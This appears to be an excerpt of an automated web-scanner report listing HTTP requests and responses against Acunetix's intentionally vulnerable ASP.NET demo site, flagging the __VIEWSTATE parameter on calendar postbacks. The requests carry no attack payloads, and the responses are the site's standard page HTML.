Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8380&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECNpQrb2ghkZGS5e07Ng%2FJMbGy6p0Ab6LPKvtVgmA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLY%2BJ3HAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEDv2I6AZYM%2B8MRqkTcfKckGJWWJ
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:53 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECNpQrb2ghkZGS5e07Ng/JMbGy6p0Ab6LPKvtVgmA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLY+J3HAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEDv2I6AZYM+8MRqkTcfKckGJWWJ" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:White" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8368&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECYqJzR2ghkZGTJotax30JaJ28kn1iz0znQALIbyg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL26oXQDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBP1Yrr1TmZQqnKLQtmeNI%2Bm8Hb%2BC
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:02 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAECYqJzR2ghkZGTJotax30JaJ28kn1iz0znQALIbyg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL26oXQDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBP1Yrr1TmZQqnKLQtmeNI+m8Hb+C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:White" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1071 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
